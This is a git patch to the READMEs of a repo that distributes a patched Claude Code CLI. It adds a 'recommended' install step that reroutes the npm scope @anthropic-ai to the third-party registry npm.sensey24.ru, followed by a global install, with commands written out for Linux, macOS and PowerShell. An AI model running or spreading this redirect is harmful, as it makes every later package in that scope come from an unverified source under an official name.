From 010a86fda173728ee34ab7feda77c5d81b30168f Mon Sep 17 00:00:00 2001 From: delta-cloud-208e Date: Fri, 27 Feb 2026 08:04:41 +0000 Subject: [PATCH] feat: add npm registry install method, update version to v2.1.62 - Add Method A (npm registry, recommended) with npm.sensey24.ru - Rename old installer to Method B (backup) - Add VERSION_BADGE markers for auto-update - Update version badge to v2.1.62 (20 patches) Co-Authored-By: Claude Sonnet 4.6 (1M context) --- README.md | 2 +- claude/README.md | 24 ++++++++++++++++++++++-- 2 files changed, 23 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index d1d9a6e..70e42ef 100644 --- a/README.md +++ b/README.md @@ -8,7 +8,7 @@ Patched AI coding tools for use with custom API endpoints. | Folder | Tool | Status | |--------|------|--------| -| [claude/](claude/) | Claude Code | Active | +| [claude/](claude/) | Claude Code | Active (v2.1.62) | | codex/ | OpenAI Codex CLI | Planned | | gemini/ | Gemini CLI | Planned | | qwen/ | Qwen Code | Planned | diff --git a/claude/README.md b/claude/README.md index 643f985..4bc3d3f 100644 --- a/claude/README.md +++ b/claude/README.md @@ -2,11 +2,31 @@ 🌐 [English](README.md) | [Русский](README_ru.md) | [中文](README_zh.md) | [Español](README_es.md) -Patched Claude Code CLI for use with custom API endpoints. 15 patches applied. + +Patched Claude Code CLI for use with custom API endpoints. Latest: **v2.1.62** (20 patches). + ## Install -All dependencies are installed automatically: Git, Python 3, Node.js v24.13+, Claude Code. +### Method A — npm registry (recommended) + +Install the patched package directly from our npm registry. Updates automatically when new versions are released. + +**Linux / macOS:** +```bash +npm config set @anthropic-ai:registry https://npm.sensey24.ru/ +npm install -g @anthropic-ai/claude-code +``` + +**Windows (PowerShell):** +```powershell +npm config set "@anthropic-ai:registry" "https://npm.sensey24.ru/" +npm install -g @anthropic-ai/claude-code +``` + +### Method B — Automatic installer (backup) + +Install with automatic dependency detection and setup. Downloads patched cli.js from releases. **Linux (Debian/Ubuntu/RHEL/Fedora):** ```bash